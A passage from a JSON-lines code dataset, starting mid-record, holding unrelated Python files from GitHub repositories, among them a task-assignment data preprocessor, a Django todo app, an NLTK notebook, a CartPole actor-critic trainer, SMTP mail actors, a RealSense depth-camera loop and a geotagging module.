small_arr_t2w, user_id2idx_dict_small, task_id2idx_dict_small\n\n\ndef new_test_data(user_id2idx_dict_small, task_id2idx_dict_small, test_path, new_test_path):\n test_checkin_new = []\n \n with open(test_path) as f_test:\n for i, line in enumerate(f_test):\n if i == 0:\n continue\n user_id = line.strip().split(',')[0]\n poi_id = line.strip().split(',')[1]\n if int(user_id) in user_id2idx_dict_small.keys() and int(poi_id) in task_id2idx_dict_small.keys():\n test_checkin_new.append(line.strip())\n\n print(len(test_checkin_new))\n np.savetxt(new_test_path, test_checkin_new, fmt=\"%s\", \n header='user_id,poi_id,timestamp,norm_time,poi_catid,latitude,longitude,trajectory_id,worker_trajectory_id')\n\n\ndef get_pre_info(user_id2idx_dict_small, task_id2idx_dict_small, test_path, test_new_path, DATASET):\n test_new_df = pd.read_csv(test_path)\n user_ids = list(set(test_new_df['user_id'].tolist()))\n poi_ids = list(set(test_new_df['poi_id'].tolist()))\n # generate the preference result all valid tasks and workers (1671, 3682)\n test_df = pd.read_csv(test_new_path)\n user_ids_old = []\n poi_ids_old = []\n for i in list(set(test_df['user_id'].tolist())):\n if i in user_id2idx_dict_small.keys():\n user_ids_old.append(i)\n for j in list(set(test_df['poi_id'].tolist())):\n if j in task_id2idx_dict_small.keys():\n poi_ids_old.append(j)\n\n final_user = [user_id2idx_dict_small[k] for k in list(set(user_ids_old).intersection(set(user_ids)))]\n final_poi = [task_id2idx_dict_small[k] for k in list(set(poi_ids_old).intersection(set(poi_ids)))]\n \n if DATASET == 'Foursquare':\n w2t_df = pd.read_csv('GroundTruth_data/Foursquare/array_small_w2t.csv', header=None)\n t2w_df = pd.read_csv('GroundTruth_data/Foursquare/array_small_t2w.csv', header=None)\n if DATASET == 'Yelp':\n w2t_df = pd.read_csv('GroundTruth_data/Yelp_FGRec/array_small_w2t.csv', header=None)\n t2w_df = pd.read_csv('GroundTruth_data/Yelp_FGRec/array_small_t2w.csv', header=None)\n\n count = -1\n w2t_pre = []\n for index, row in w2t_df.iterrows():\n line_pre = []\n if index not in final_user:\n continue\n else:\n count += 1\n for p in range(len(row)):\n if p not in final_poi:\n continue\n else:\n line_pre.append(row[p])\n w2t_pre.append(line_pre)\n\n t2w_pre = []\n for index, row in t2w_df.iterrows():\n line_pre = []\n if index not in final_poi:\n continue\n else:\n for p in range(len(row)):\n if p not in final_user:\n continue\n else:\n line_pre.append(row[p])\n t2w_pre.append(line_pre)\n\n if DATASET == 'Foursquare':\n np.savetxt('GroundTruth_data/Foursquare/w2t_preference.csv', w2t_pre, delimiter=',', fmt='%s')\n np.savetxt('GroundTruth_data/Foursquare/t2w_preference.csv', t2w_pre, delimiter=',', fmt='%s')\n if DATASET == 'Yelp':\n np.savetxt('GroundTruth_data/Yelp_FGRec/w2t_preference.csv', w2t_pre, delimiter=',', fmt='%s')\n np.savetxt('GroundTruth_data/Yelp_FGRec/t2w_preference.csv', t2w_pre, delimiter=',', fmt='%s')\n \n\ndef get_assign_info(user_id2idx_dict_small, task_id2idx_dict_small, new_test_path):\n worker_info = []\n assign_info = []\n test_new_df = pd.read_csv(new_test_path)\n user_ids = list(set(test_new_df['user_id'].tolist()))\n for user_id in set(user_ids):\n user_df = test_new_df[test_new_df['user_id'] == user_id]\n worker_id = user_id2idx_dict_small[user_id]\n\n if len(user_df) == 1:\n worker_lat = user_df['latitude'].to_list()[-1]\n worker_lon = user_df['longitude'].to_list()[-1]\n worker_starttime = user_df['timestamp'].to_list()[-1]\n else:\n worker_lat = user_df['latitude'].to_list()[-2]\n worker_lon = user_df['longitude'].to_list()[-2]\n worker_starttime = user_df['timestamp'].to_list()[-2]\n\n task_id = task_id2idx_dict_small[int(user_df['poi_id'].to_list()[-1])]\n task_lat = user_df['latitude'].to_list()[-1]\n task_lon = user_df['longitude'].to_list()[-1]\n task_completetime = user_df['timestamp'].to_list()[-1]\n task_cat = user_df['poi_catid'].to_list()[-1]\n\n assign_info.append([worker_id, worker_lat, worker_lon, task_id, task_lat, task_lon, worker_starttime, task_completetime, task_cat])\n worker_info.append([worker_id, worker_lat, worker_lon, worker_starttime])\n return assign_info, worker_info\n\n\ndef get_task_info(task_id2idx_dict_small, new_test_path):\n task_info = []\n test_new_df = pd.read_csv(new_test_path)\n task_ids = list(set(test_new_df['poi_id'].tolist()))\n for t_id in task_ids:\n \n task_df = test_new_df[test_new_df['poi_id'] == t_id]\n \n try:\n task_id = task_id2idx_dict_small[t_id]\n # print(task_id)\n task_lat = task_df['latitude'].to_list()[-1]\n task_lon = task_df['longitude'].to_list()[-1]\n task_cat = task_df['poi_catid'].to_list()[-1]\n task_completetime = task_df['timestamp'].to_list()[-1]\n task_info.append([task_id, task_lat, task_lon, task_cat, task_completetime])\n except:\n import pdb; pdb.set_trace()\n \n return task_info\n\n\nif __name__ == '__main__':\n\n # DATASET = 'Foursquare'\n DATASET = 'Yelp'\n\n if DATASET == 'Foursquare':\n with open('/nas/project/xieyuan/Bi-preference-TA/Preference_value/Foursquare/Foursqaure_worker_to_task_preference_time_newcat.pkl', 'rb') as f_worker,\\\n open('/nas/project/xieyuan/Bi-preference-TA/Preference_value/Foursquare/Foursquare_task_to_worker_preference_time_newcat.pkl', 'rb') as f_task:\n worker2task_pre = pickle.load(f_worker)\n task2worker_pre = pickle.load(f_task)\n\n if DATASET == 'Yelp':\n with open('/nas/project/xieyuan/Bi-preference-TA/Preference_value/Yelp_FGRec/Yelp_worker_to_task_preference_time.pkl', 'rb') as f_worker, \\\n open('/nas/project/xieyuan/Bi-preference-TA/Preference_value/Yelp_FGRec/Yelp_task_to_worker_preference_time.pkl', 'rb') as f_task:\n worker2task_pre = pickle.load(f_worker)\n task2worker_pre = pickle.load(f_task)\n\n small_worker_num = len([int(x.split('_')[0]) for x,_ in worker2task_pre])\n small_task_num = len([int(x.split('_')[0]) for x,_ in task2worker_pre])\n big_worker_num = len(task2worker_pre[0][1])\n big_task_num = len(worker2task_pre[0][1])\n\n print(f'small_worker_num: {small_worker_num}')\n print(f'big_task_num: {big_task_num}')\n print(f'small_task_num: {small_task_num}')\n print(f'big_worker_num: {big_worker_num}')\n\n small_arr_w2t = np.zeros((small_worker_num, small_task_num))\n small_arr_t2w = np.zeros((small_task_num, small_worker_num))\n big_arr_w2t = np.zeros((big_worker_num, big_task_num))\n big_arr_t2w = np.zeros((big_task_num, big_worker_num))\n\n print(f'small w2t array shape: {small_arr_w2t.shape}')\n print(f'small t2w array shape: {small_arr_t2w.shape}')\n print(f'big w2t array shape: {big_arr_w2t.shape}')\n print(f'big t2w array shape: {big_arr_t2w.shape}')\n\n # # extract the preference info\n # big_arr_w2t, big_arr_t2w = big_array()\n print('--> generate small array')\n small_arr_w2t, small_arr_t2w, user_id2idx_dict_small, task_id2idx_dict_small = small_array(worker2task_pre, task2worker_pre, DATASET)\n\n # # generate checkin new data\n if DATASET == 'Foursquare':\n test_path = 'data-process/Foursquare/Foursquare_test.txt'\n new_test_path = 'data-process/Foursquare/Foursquare_test_new.txt'\n if DATASET == 'Yelp':\n test_path = 'data-process/Yelp_FGRec/Yelp_test.txt'\n new_test_path = 'data-process/Yelp_FGRec/Yelp_test_new.txt'\n \n # generate new test dataset\n # new_test_data(user_id2idx_dict_small, task_id2idx_dict_small, test_path, new_test_path)\n # # get the w2t & t2w preference score\n print('--> preference info')\n get_pre_info(user_id2idx_dict_small, task_id2idx_dict_small, test_path, new_test_path, DATASET)\n\n # get final assignment info\n print('--> info...')\n assign_info, worker_info = get_assign_info(user_id2idx_dict_small, task_id2idx_dict_small, new_test_path)\n # # get worker & task info\n task_info = get_task_info(task_id2idx_dict_small, new_test_path)\n\n import pdb; pdb.set_trace()\n\n if DATASET == 'Foursquare':\n goundtruth_path = 'GroundTruth_data/Foursquare/task_assignment_groundtruth.csv'\n worker_info_path = 'GroundTruth_data/Foursquare/worker_info.csv'\n task_info_path = 'GroundTruth_data/Foursquare/task_info.csv'\n if DATASET == 'Yelp':\n goundtruth_path = 'GroundTruth_data/Yelp_FGRec/task_assignment_groundtruth.csv'\n worker_info_path = 'GroundTruth_data/Yelp_FGRec/worker_info.csv'\n task_info_path = 'GroundTruth_data/Yelp_FGRec/task_info.csv'\n\n with open(goundtruth_path, 'w') as f_GT:\n writer = csv.writer(f_GT)\n writer.writerow(['worker_id', 'worker_lat', 'worker_lon', 'task_id', 'task_lat', 'task_lon', 'worker_start', 'task_complete', 'task_category'])\n writer.writerows(assign_info)\n \n with open(worker_info_path, 'w') as f_W:\n writer = csv.writer(f_W)\n writer.writerow(['worker_id', 'worker_lat', 'worker_lon', 'worker_start'])\n writer.writerows(worker_info)\n \n with open(task_info_path, 'w') as f_T:\n writer = csv.writer(f_T)\n writer.writerow([ 'task_id', 'task_lat', 'task_lon', 'task_category', 'task_complete'])\n writer.writerows(task_info)\n\n","repo_name":"eeeeeexy/BPPTA","sub_path":"dataprocess_final.py","file_name":"dataprocess_final.py","file_ext":"py","file_size_in_byte":13955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"26799216363","text":"a,b=map(int,input().split())\n\ndef f(n):\n p=0\n if n%2==1:\n p=(n+1)//2\n if p%2==0:\n return 0\n else:\n return 1\n else:\n p=n//2\n if p%2==0:\n return n^0\n else:\n return n^1\n\nprint(f(a-1)^f(b))","repo_name":"Valkyrja3607/AtCoder","sub_path":"atcoder.jp/abc121/abc121_d/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"71315012475","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse\nfrom .models import Todo\nfrom .forms import TodoForm\n# Create your views here.\ndef index(request):\n\tobjs = Todo.objects.all()\n\tform = TodoForm()\n\tcontent ={\n\t\t\"objects\":objs,\n\t\t\"form\":form\n\t}\n\tif request.method==\"POST\":\n\t\tform = TodoForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tform.save()\n\n\t\treturn redirect('/')\n\treturn render(request, \"todo/index.html\",content)\n\ndef update(request, pk):\n\tupdatedtodo = Todo.objects.get(id=pk)\n\n\tform = TodoForm(instance = updatedtodo)\n\tcontent = {\n\t\t'form':form\n\t}\n\tif request.method == \"POST\":\n\t\tform = TodoForm(request.POST,instance = updatedtodo)\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\treturn redirect('/')\n\treturn render(request,\"todo/edit.html\", content)\n\n\ndef delete(request, pk):\n\titem = Todo.objects.get(id = pk)\n\tcontent = {\"item\": item}\n\tif request.method==\"POST\":\n\t\titem.delete()\n\t\treturn redirect('/')\n\treturn\trender(request, 'todo/delete.html', content)","repo_name":"yasser-khelalef/Django-Projects","sub_path":"ToDo App/todo/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"39303226754","text":"# (a) Ask the user to enter a sentence and print out the third word of the sentence.\n# (b) Ask the user to enter a sentence and print out every third word of the sentence.\n\nuser_str = input('Provide a sentence: ')\n\nsplitted_str = user_str.split(' ')\n\nprint(splitted_str[2])\n\n# Provide a sentence: Tade runs very fast.\n# very","repo_name":"shinaeli/My-Python-Codes","sub_path":"A Practical Introduction To Python Programming/Exercise 8.7/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"40352036279","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[4]:\n\n\nget_ipython().system('pip install nltk -U')\nget_ipython().system('pip install bs4 -U')\n\n\n# In[6]:\n\n\nimport nltk\nnltk.download('stopwords')\nnltk.download('punkt')\nnltk.download('wordnet')\nnltk.download('averaged_perceptron_tagger')\n\n\n# In[7]:\n\n\nimport nltk\n\n\n# In[8]:\n\n\npara='Rajgad (literal meaning Ruling Fort) is a Hill region fort situated in the Pune district of Maharashtra, India. Formerly known as Murumbdev, the fort was the first capital of the Maratha Empire under the rule of Chhatrapati Shivaji for almost 26 years, after which the capital was moved to the Raigad Fort.[1] Treasures discovered from an adjacent fort called Torna were used to completely build and fortify the Rajgad Fort'\n\n\n# In[9]:\n\n\nprint(para)\n\n\n# In[10]:\n\n\npara.split()\n\n\n# In[11]:\n\n\nfrom nltk.tokenize import sent_tokenize\nfrom nltk.tokenize import word_tokenize\n\n\n# In[12]:\n\n\nsent=sent_tokenize(para)\n\n\n# In[13]:\n\n\nsent[2]\n\n\n# In[14]:\n\n\nwords=word_tokenize(para)\n\n\n# In[15]:\n\n\nwords\n\n\n# In[16]:\n\n\nfrom nltk.corpus import stopwords\n\n\n# In[17]:\n\n\nswords=stopwords.words('english')\n\n\n# In[18]:\n\n\nswords\n\n\n# In[19]:\n\n\nx=[word for word in words if word not in swords]\n\n\n# In[20]:\n\n\nx\n\n\n# In[23]:\n\n\nx=[word for word in words if word.lower() not in swords]\n\n\n# In[24]:\n\n\nx\n\n\n# In[25]:\n\n\nfrom nltk.stem import PorterStemmer\n\n\n# In[26]:\n\n\nps=PorterStemmer()\n\n\n# In[27]:\n\n\nps.stem('working')\n\n\n# In[28]:\n\n\ny=[ps.stem(word) for word in x]\n\n\n# In[29]:\n\n\ny\n\n\n# In[30]:\n\n\nfrom nltk.stem import WordNetLemmatizer\n\n\n# In[31]:\n\n\nwnl=WordNetLemmatizer()\n\n\n# In[32]:\n\n\nwnl.lemmatize('workng', pos='v')\n\n\n# In[33]:\n\n\nnltk.download('omw-1.4')\n\n\n# In[34]:\n\n\nwnl.lemmatize('working', pos='v')\n\n\n# In[35]:\n\n\nprint(ps.stem('went'))\nprint(wnl.lemmatize('went',pos='v'))\n\n\n# In[36]:\n\n\nz=[wnl.lemmatize(word,pos='v') for word in x]\n\n\n# In[37]:\n\n\nz\n\n\n# In[38]:\n\n\nimport string\n\n\n# In[39]:\n\n\nstring.punctuation\n\n\n# In[40]:\n\n\nt=[word for word in words if word not in string.punctuation]\n\n\n# In[41]:\n\n\nt\n\n\n# In[42]:\n\n\nfrom nltk import pos_tag\n\n\n# In[43]:\n\n\npos_tag(t)\n\n\n# In[44]:\n\n\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n\n\n# In[46]:\n\n\ntfidf= TfidfVectorizer()\n\n\n# In[47]:\n\n\nv=tfidf.fit_transform(t)\n\n\n# In[48]:\n\n\nv.shape\n\n\n# In[49]:\n\n\nimport pandas as pd\npd.DataFrame(v)\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"yogeshpoul/Storage","sub_path":"DSBDA_PR_7.py","file_name":"DSBDA_PR_7.py","file_ext":"py","file_size_in_byte":2309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"42161176954","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Feb 24 22:14:21 2023\n\n@author: ben\n\"\"\"\n\nimport sys\nsys.path.append(\"../Utils\")\nfrom plot import plot\nimport gym\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\n\n\n\n\ndef create_environment():\n env = gym.make(\"CartPole-v0\") # Create the environment\n return env\n \n\ndef create_network():\n \"\"\"\n Creates a neural network model that takes num_inputs \n inputs, has a hidden layer with num_hidden units and \n an output layer with num_actions units for action \n probabilities and a single output for the state value \n estimate.\n\n Parameters:\n -----------\n num_inputs : int\n The number of input features.\n num_hidden : int \n The number of units in the \n hidden layer.\n num_actions : int \n The number of possible actions.\n\n Returns:\n --------\n keras.Model: \n A compiled Keras model.\n \"\"\"\n \n inputs = layers.Input(shape=(num_inputs,))\n common = layers.Dense(num_hidden, activation=\"relu\")(inputs)\n action = layers.Dense(num_actions, activation=\"softmax\")(common)\n critic = layers.Dense(1)(common)\n \n model = keras.Model(inputs=inputs, outputs=[action, critic])\n return model\n\ndef train():\n eps = np.finfo(np.float32).eps.item() # Smallest number such that 1.0 + eps != 1.0\n gamma = 0.99 # Discount factor for past rewards\n max_steps_per_episode = 1000\n\n optimizer = keras.optimizers.Adam(learning_rate=0.01)\n huber_loss = keras.losses.Huber()\n action_probs_history = []\n critic_value_history = []\n rewards_history = []\n running_reward_history = []\n running_reward = 0\n episode_count = 0\n \n while True: # Run until solved\n result = env.reset()\n episode_reward = 0\n with tf.GradientTape() as tape:\n for timestep in range(1, max_steps_per_episode):\n # env.render(); Adding this line would show the attempts\n # of the agent in a pop up window.\n \n state = tf.convert_to_tensor(result[0])\n state = tf.expand_dims(state, 0)\n \n # Predict action probabilities and estimated future rewards\n # from environment state\n action_probs, critic_value = model(state)\n critic_value_history.append(critic_value[0, 0])\n \n # Sample action from action probability distribution\n action = np.random.choice(num_actions, p=np.squeeze(action_probs))\n action_probs_history.append(tf.math.log(action_probs[0, action]))\n \n # Apply the sampled action in our environment\n result = env.step(action)\n rewards_history.append(result[1])\n episode_reward += result[1]\n \n if result[2]:\n break\n \n # Update running reward to check condition for solving\n running_reward = 0.05 * episode_reward + (1 - 0.05) * running_reward\n running_reward_history.append(running_reward)\n \n # Calculate expected value from rewards\n # - At each timestep what was the total reward received after that timestep\n # - Rewards in the past are discounted by multiplying them with gamma\n # - These are the labels for our critic\n returns = []\n discounted_sum = 0\n for r in rewards_history[::-1]:\n discounted_sum = r + gamma * discounted_sum\n returns.insert(0, discounted_sum)\n \n # Normalize\n returns = np.array(returns)\n returns = (returns - np.mean(returns)) / (np.std(returns) + eps)\n returns = returns.tolist()\n \n # Calculating loss values to update our network\n history = zip(action_probs_history, critic_value_history, returns)\n actor_losses = []\n critic_losses = []\n for log_prob, value, ret in history:\n # At this point in history, the critic estimated that we would get a\n # total reward = `value` in the future. We took an action with log probability\n # of `log_prob` and ended up recieving a total reward = `ret`.\n # The actor must be updated so that it predicts an action that leads to\n # high rewards (compared to critic's estimate) with high probability.\n diff = ret - value\n actor_losses.append(-log_prob * diff) # actor loss\n \n # The critic must be updated so that it predicts a better estimate of\n # the future rewards.\n critic_losses.append(\n huber_loss(tf.expand_dims(value, 0), tf.expand_dims(ret, 0))\n )\n \n # Backpropagation\n loss_value = sum(actor_losses) + sum(critic_losses)\n grads = tape.gradient(loss_value, model.trainable_variables)\n optimizer.apply_gradients(zip(grads, model.trainable_variables))\n \n # Clear the loss and reward history\n action_probs_history.clear()\n critic_value_history.clear()\n rewards_history.clear()\n \n # Log details\n episode_count += 1\n if episode_count % 10 == 0:\n template = \"running reward: {:.2f} at episode {}\"\n print(template.format(running_reward, episode_count))\n \n if running_reward > 795: # Condition to consider the task solved\n print(\"Solved at episode {}!\".format(episode_count))\n plot(x=[],\n y=[running_reward_history],\n xlabel=\"Episoden\",\n ylabel=\"Belohnung\")\n break\n \n \n \n \n \n \nif __name__ == \"__main__\":\n num_inputs = 4\n num_actions = 2\n num_hidden = 128\n \n env = create_environment()\n model = create_network()\n train()\n \n \n \n \n \n \n ","repo_name":"BenBotsch/Maschinelles-Lernen","sub_path":"9_Anwendungen/cart.py","file_name":"cart.py","file_ext":"py","file_size_in_byte":6073,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"32861575168","text":"#!/usr/bin/env python\n#\n# -*- coding: utf-8 -*-\n#\n# Created by Adam Fiebig\n# Last modified: 4-15-2015 by Adam Fiebig\n\nfrom compysition import Actor\nfrom email.mime.text import MIMEText\nimport smtplib\nimport gsmtpd.server\nimport email\nimport traceback\nfrom bs4 import BeautifulSoup\nimport re\nfrom compysition.event import XMLEvent, JSONEvent\n\nclass SMTPOut(Actor):\n\n input = XMLEvent\n output = XMLEvent\n\n '''**Module which sends mime emails with propertied specified in XML event data.**\n\n Parameters:\n\n - name (str): The instance name.\n '''\n\n address_regex = re.compile(\"^.*@.*$\")\n\n def __init__(self, name, from_address=None, domain=None, key=None, host=(\"localhost\", 25), *args, **kwargs):\n Actor.__init__(self, name, *args, **kwargs)\n self.blockdiag_config[\"shape\"] = \"mail\"\n self.logger.info(\"Initialized SMTPOut Actor\")\n self.key = key or self.name\n self.host = host\n self.domain = domain\n self.address = self.normalize_address(from_address, self.domain)\n self.body_tag = 'Body'\n\n def normalize_address(self, address, domain):\n \"\"\"\n If an address does not match some_address@some_domain.com, concatenate the address and domain.\n If the address is none, it will return none.\n If the address is not a full address the domain is none, it will return none\n \"\"\"\n if address is not None and not self.address_regex.match(address):\n if domain is not None:\n address = \"{address}@{domain}\".format(address=address, domain=domain)\n else:\n address = None\n\n return address\n\n def consume(self, event, *args, **kwargs):\n msg_xml = event.data\n to = msg_xml.find(\"To\").text\n from_element = msg_xml.find(\"From\")\n from_address = self.normalize_address(from_element.text, self.domain)\n from_element.text = from_address\n if to != \"None\" and to is not None:\n msg = MIMEText(msg_xml.find(self.body_tag).text) # Create a mime obj with our body text\n for element in msg_xml: # Set each tag's text as a property on the MIMEText obj\n if element.tag != self.body_tag:\n msg[element.tag] = element.text\n\n try:\n self.send(msg, to, from_address)\n except Exception as err:\n self.logger.error(\"Error sending message: {err}\".format(err=traceback.format_exc()), event=event)\n else:\n self.logger.info(\"Email sent to {to} from {from_address} via smtp server {host}\".format(to=to,\n from_address=from_address,\n host=self.host), event=event)\n else:\n self.logger.info(\"No email recipient specified, notification was not sent\", event=event)\n\n self.send_event(event)\n\n def send(self, msg, to, from_address):\n sender = smtplib.SMTP(self.host)\n sender.sendmail(from_address, to.split(\",\"), msg.as_string())\n sender.quit()\n\n\nclass SMTPIn(Actor):\n '''**Module which sends mime emails with propertied specified in XML event data.**\n\n Parameters:\n\n - name (str): The instance name.\n '''\n\n output = [XMLEvent, JSONEvent]\n\n def __init__(self, name, host=\"localhost\", ports=[25], output_format='xml', keyfile=None, certfile=None, ssl_version=None, *args, **kwargs):\n Actor.__init__(self, name, *args, **kwargs)\n self.blockdiag_config[\"shape\"] = \"mail\"\n self.output_format = output_format\n if not isinstance(ports, list):\n ports = [ports]\n\n self.servers = []\n for port in ports:\n server = gsmtpd.server.SMTPServer(\"{host}:{port}\".format(host=host, port=port),\n keyfile=keyfile,\n certfile=certfile,\n ssl_version=ssl_version)\n server.process_message = self.process_message\n self.servers.append(server)\n\n def pre_hook(self):\n [server.start() for server in self.servers]\n\n def process_message(self, peer, mailfrom, rcpttos, data):\n headers = email.message_from_string(data)\n payload = headers.get_payload()\n new_data = dict(zip(headers.keys(), headers.values()))\n\n payload_data = headers.get_payload()\n if isinstance(payload_data, list):\n payload = filter(lambda x: x.get_content_type() == \"text/plain\", payload)[0]\n\n if payload is None:\n html = filter(lambda x: x.get_content_type() == \"text/html\", payload)[0]\n payload = BeautifulSoup(html.get_payload(), \"lxml\").get_text()\n else:\n payload = payload.get_payload()\n\n payload_data = payload\n\n new_data['payload'] = payload_data\n\n if self.output_format == 'xml':\n new_data['email'] = new_data\n event = XML(data=new_data)\n else:\n event = JSON(data=new_data)\n\n self.send_event(event)\n\n def consume(self, event, *args, **kwargs):\n pass\n","repo_name":"fiebiga/compysition","sub_path":"compysition/actors/smtp.py","file_name":"smtp.py","file_ext":"py","file_size_in_byte":5347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"12578735811","text":"from flet import *\nfrom flet_route import Params, Basket\n\nfrom packages.api import GetQuote\nfrom packages.controls import LinkButton, DisplayQuotation\nfrom packages.schemas import Quotation\nfrom packages.styles import COLORS\n\n\nclass About:\n def __init__(self):\n print(f\"{self.__class__.__name__.upper()}.__init__()\")\n\n async def view(self, page: Page, params: Params, basket: Basket):\n print(f\"-->{self.__class__.__name__.upper()}.view()\")\n self.page = page\n\n if not hasattr(basket, \"quote\"):\n self.quote = Quotation(author=\"No author\", quote=\"No quotation\")\n else:\n self.quote = basket.quote\n\n # ALTERNATE SYNTAX\n # if basket.get(\"quote\") is not None:\n # self.quote = basket.quote\n # else:\n # self.quote = Quotation(author=\"No author\", quote=\"No quotation\")\n\n self.display_quotation = DisplayQuotation(self.quote)\n self.home_button = LinkButton(\"HOME\", \"/\")\n\n self.screen = Container(\n Column(\n [\n Text(\n \"This quotation was passed through the BASKET.\",\n size=24,\n color=COLORS[\"text\"],\n font_family=\"Mont-Semi-Bold\",\n ),\n self.display_quotation,\n self.home_button,\n ],\n width=512,\n alignment=MainAxisAlignment.CENTER,\n ),\n bgcolor=COLORS[\"background\"],\n alignment=alignment.center,\n expand=True,\n )\n\n return View(\n \"/about\",\n controls=[self.screen],\n bgcolor=COLORS[\"background\"],\n scroll=False,\n padding=0,\n spacing=0,\n )\n","repo_name":"polae/flet-route-async","sub_path":"pages/about.py","file_name":"about.py","file_ext":"py","file_size_in_byte":1822,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"41519848670","text":"import pyrealsense2.pyrealsense2 as rs\nimport numpy as np\nimport cv2\nimport time as t\n\nactuators = 8\nx_res = 640\ny_res = 480\nfps = 30\nqueue_size = 50\ndecimation_level = 1\nmin_dist = 600\nmax_dist = 2000\n\ni_iter = int(y_res/decimation_level)\nj_iter = int(x_res/decimation_level)\n\n# def check_distance\ntry:\n pipeline = rs.pipeline()\n\n config = rs.config()\n config.enable_stream(rs.stream.depth, x_res, y_res, rs.format.z16, fps)\n\n frame_queue = rs.frame_queue(queue_size, keep_frames=True)\n\n decimation_filter = rs.decimation_filter(decimation_level)\n hole_filter = rs.hole_filling_filter()\n spatial_filter = rs.spatial_filter(0.5, 20, 5, 0)\n temporal_filter = rs.temporal_filter()\n depth2disparity = rs.disparity_transform()\n disparity2depth = rs.disparity_transform(False)\n \n\n pipeline.start(config, frame_queue)\n #pipeline.start(config)\n count = 0\n q_time_avg = 0\n filter_time_avg = 0\n loop_time_avg = 0\n open_cv_time_avg = 0\n\n while(True):\n t1 = t.time()\n #print(t1)\n frame = frame_queue.wait_for_frame()\n #frame = pipeline.wait_for_frames()\n depth_frame = frame.as_frameset().get_depth_frame()\n #depth_frame = frame.get_depth_frame()\n t2 = t.time() # time to queue\n depth_frame_filtered = depth_frame\n\n depth_frame_filtered = decimation_filter.process(depth_frame_filtered)\n depth_frame_filtered = depth2disparity.process(depth_frame_filtered)\n depth_frame_filtered = spatial_filter.process(depth_frame_filtered)\n depth_frame_filtered = temporal_filter.process(depth_frame_filtered)\n depth_frame_filtered = disparity2depth.process(depth_frame_filtered)\n depth_frame_filtered = hole_filter.process(depth_frame_filtered)\n\n t3 = t.time() # time to filter\n depth_image = np.asanyarray(depth_frame_filtered.get_data())\n # for i in range(i_iter):\n # for j in range(j_iter):\n # ind = (i,j)\n # if type(depth_image[i,j]) is not np.uint16:\n # depth_image[i,j] = 0\n# if depth_image[i,j] > max_dist or depth_image[i,j] < min_dist:\n# depth_image[i,j] = 0\n t4 = t.time() # loop time\n\n depth_colormap = cv2.applyColorMap(cv2.convertScaleAbs(depth_image, alpha=0.03), cv2.COLORMAP_JET)\n cv2.namedWindow('RealSense', cv2.WINDOW_AUTOSIZE)\n cv2.imshow('RealSense', depth_colormap)\n cv2.waitKey(1)\n t5 = t.time()\n #print(t5)\n #print()\n q_time_avg += t2-t1\n filter_time_avg += t3-t2\n loop_time_avg += t4-t3\n open_cv_time_avg += t5-t4\n count += 1\nfinally:\n pipeline.stop()\n q_time_avg = q_time_avg/count\n filter_time_avg = filter_time_avg/count\n loop_time_avg = loop_time_avg/count\n open_cv_time_avg = open_cv_time_avg/count\n total_time = q_time_avg + filter_time_avg + loop_time_avg + open_cv_time_avg\n print(q_time_avg, filter_time_avg, loop_time_avg, open_cv_time_avg, total_time)\n print('pipeline stop')\n","repo_name":"awmckenzie/24452-Design-II","sub_path":"realsense_frame_q.py","file_name":"realsense_frame_q.py","file_ext":"py","file_size_in_byte":3075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"21352762603","text":"import os\nimport typing as T\n\nfrom . import image_log\nfrom . import processing\n\n\ndef process_geotag_properties(\n import_path: T.Optional[str] = None,\n video_import_path: T.Optional[str] = None,\n geotag_source=\"exif\",\n geotag_source_path: T.Optional[str] = None,\n offset_time=0.0,\n offset_angle=0.0,\n skip_subfolders=False,\n) -> None:\n if not import_path or not os.path.isdir(import_path):\n raise RuntimeError(\n f\"Error, import directory {import_path} does not exist, exiting...\"\n )\n\n process_file_list = image_log.get_total_file_list(\n import_path,\n skip_subfolders=skip_subfolders,\n )\n if not process_file_list:\n return\n\n if geotag_source == \"exif\":\n return processing.geotag_from_exif(process_file_list, offset_time, offset_angle)\n\n elif geotag_source == \"gpx\":\n if geotag_source_path is None:\n raise RuntimeError(\n \"GPX file is required to be specified with --geotag_source_path\"\n )\n return processing.geotag_from_gpx_file(\n process_file_list,\n geotag_source_path,\n offset_time=offset_time,\n offset_angle=offset_angle,\n )\n elif geotag_source == \"nmea\":\n if geotag_source_path is None:\n raise RuntimeError(\n \"NMEA file is required to be specified with --geotag_source_path\"\n )\n return processing.geotag_from_nmea_file(\n process_file_list,\n geotag_source_path,\n offset_time=offset_time,\n offset_angle=offset_angle,\n )\n elif geotag_source == \"gopro_videos\":\n if geotag_source_path is None:\n geotag_source_path = video_import_path\n if geotag_source_path is None:\n raise RuntimeError(\"geotag_source_path is required\")\n return processing.geotag_from_gopro_video(\n process_file_list,\n geotag_source_path,\n offset_time=offset_time,\n offset_angle=offset_angle,\n )\n else:\n raise RuntimeError(f\"Invalid geotag source {geotag_source}\")\n","repo_name":"mapilio/mapilio-kit","sub_path":"mapilio_kit/process_geotag_properties.py","file_name":"process_geotag_properties.py","file_ext":"py","file_size_in_byte":2133,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"96"} 